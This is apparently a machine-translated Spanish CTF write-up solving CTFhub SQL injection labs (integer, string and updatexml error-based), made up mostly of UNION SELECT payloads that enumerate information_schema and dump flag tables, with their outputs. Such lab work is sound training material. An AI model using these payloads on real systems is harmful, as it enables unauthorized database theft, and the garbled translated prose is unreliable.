Hoy ctfhub de terminar el proceso de solución de inyección SQL varios problemas, todavía es más detallada.
Es de conocimiento relativamente común: el conocimiento de cada tema se refiere en general explicarse por una forma
! Nota: la siguiente tabla information_schema.xxxxxxxxxxxxxx se expresan en la biblioteca INFORMATION_SCHEMA
Tales como: esquemas, tablas y similares, no se especifique lo contrario en la tabla se refiere al repositorio de datos información
Hay preguntas aquí que la integración ctfhub del bien, así que todo base de datos y tabla incluye nombres de campo son los mismos, no ser perezoso.
Palabra clave / Declaración / Función | explicación |
---|---|
union select | La investigación conjunta, inyección common conjunta |
base de datos() | Echo base de datos conectada |
versión() | La vista SQL de la versión actual, tales como: MySQL 1.2.3, 4.5.6-MariaDB |
GROUP_CONCAT () | El mismo grupo de valores generados, conectados para formar una cadena |
INFORMATION_SCHEMA | Guardar una gran cantidad de información de base de datos MySQL |
information_schema.schemata | Una biblioteca de mesa INFORMATION_SCHEMA, llamados esquemas |
schema_name | esquemas almacena en la base de datos MySQL tabla de todos los nombres de los campos |
INFORMATION_SCHEMA.TABLES | Me salvó toda la tabla mysql |
esquema_tabla | Cada tablas de la base almacenados en la tabla correspondiente al campo nombre de la tabla |
nombre de la tabla | El nombre de la tabla y de una sola esquema_tabla |
INFORMATION_SCHEMA.COLUMNS | Columnas de la tabla mantienen todas las columnas de una 4 |
COLUMN_NAME | Cuando se conoce el nombre de una tabla, los nombres de todos los campos disponibles (nombre de la columna) de la tabla en el momento en el campo |
nombre de la tabla | Nombre de la mesa y la correspondencia COLUMN_NAME |
seleccionar updatexml (1, concat (0x7E, base de datos () , 0x7e), 1); | Tenga en cuenta que aquí, solamente () en el contenido que desea cambio en el error DATABSE puede hacer eco |
derecha (str, num) | NUM caracteres cadena de interceptación a partir de la derecha |
izquierda (str, num) | Parecida: NUM caracteres de Cuerda de la interceptación izquierda |
substr (str, N, M) | String, a partir de la N-ésima carácter, símbolos M tomadas |
inyección número entero 1.SQL
- Explosión base de datos actual
4 union select 3,database()
select * from news where id=4 union select 3,database()
ID: 3
Datos: sqli
-
De acuerdo con information_schema.schemata toda la base de datos de ráfaga
4 union select 3,group_concat(schema_name) from information_schema.schemata
select * from news where id=4 union select 3,group_concat(schema_name) from information_schema.schemata
ID: 3
Datos: INFORMATION_SCHEMA, MySQL, performance_schema, sqli
- Según INFORMATION_SCHEMA.TABLES y conocido nombre de la base sqli mesa de estallido
4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
select * from news where id=4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
ID: 3
Datos: noticias, bandera
-
Conocer la mesa de la bandera, fue a los campos como INFORMATION_SCHEMA.COLUMNS explosivos sin detonar nombre de la tabla y la bandera
4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
select * from news where id=4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
ID: 3
Datos: bandera
5. Conocer el campo de la bandera de esa manera, y compruebe el contenido en su interior directamente
4 union select 3,group_concat(flag) from sqli.flag
select * from news where id=4 union select 3,group_concat(flag) from sqli.flag
ID: 3
Datos: ctfhub {} cf0c7df79d5f387aca776784bb5cfaebf98980f0
inyección de carácter 2.SQL
- El número de columnas explosivos, pero no se rompen, porque el eco en dos: Identificación, DATOS
3' union select database(),version() #
-
nombre de la biblioteca explosión
3' union select database(),group_concat(schema_name) from information_schema.schemata #
Echo: Nombre de la base sqli
select * from news where id='3' union select database(),group_concat(schema_name) from information_schema.schemata #'
ID: sqli
datos: INFORMATION_SCHEMA, performance_schema, MySQL, sqli -
nombres de las columnas de explosión
3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
tabla de eco: bandera
select * from news where id='3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
ID: sqli
datos: noticias, bandera -
Explosión nombre del campo
3' union select database(),group_concat(column_name) from information_schema.columns where table_name='flag' #
回显字段名: bandera de
seleccionar * de noticias donde id = '3' union select base de datos (), GROUP_CONCAT (nombre_columna) de INFORMATION_SCHEMA.COLUMNS donde nombre_tabla = 'bandera' #'
ID: sqli
datos: bandera -
Explosión nombre del campo
3' union select database(),group_concat(flag) from sqli.flag #'
select * from news where id='' union select database(),group_concat(flag) from sqli.flag #'
ID: sqli
datos: ctfhub {} 4f0e4923b55e73aa9a1a5fd66fb88b13a1e9e7f2
inyección error 3.SQL
- Explosión base de datos actual
1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #
-
Burst todas las bases de datos, prestar atención a utilizar soportes para envolver la línea
1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
Todo parte de la base de datos de eco, no encontró eco nombre sqli, por lo que definitivamente volver longitud limitada obvio, antes utilizado antes, substr, izquierda, mediados de, y las funciones correctas
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
Consulta de error: error de sintaxis XPath: '~ INFORMATION_SCHEMA, MySQL, perfor'
Tenga en cuenta que el carácter de vuelta parecía Longitud máxima: 32
-
31 caracteres a la derecha de la explosión y encontrado solapamiento,
1 union select updatexml(1,concat(0x7e,right( (select(group_concat(schema_name))from information_schema.schemata) ,31 ),0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(schema_name))from information_schema.schemata) ,31) ,0x7e),1); #
Consulta de error: error de sintaxis XPath: '~ a, MySQL, performance_schema, sqli'Así que en total: INFORMATION_SCHEMA, MySQL, performance_schema, SQLi cuatro bases de datos
-
mesa de estallar
1 union select updatexml(1,concat(0x7e,
(select(group_concat(table_name))from information_schema.tables where table_schema="sqli")
,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1); #
Consulta de error: error de sintaxis XPath: ' Noticias, Bandera '
- nombres de las columnas de explosión
1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
Consulta de error: error de sintaxis XPath: ' Bandera '
- contenido de explosión
Una porción de la bandera:
1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
Query Error: error de sintaxis XPath: '~ {ctfhub 2333ee20c980f72952ce65c4'
Otra parte de la bandera:
1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
Consulta de error: error de sintaxis XPath: '~ 80f72952ce65c494ec82b147e9940d}'bandera de empalme: ctfhub {} 2333ee20c980f72952ce65c494ec82b147e9940d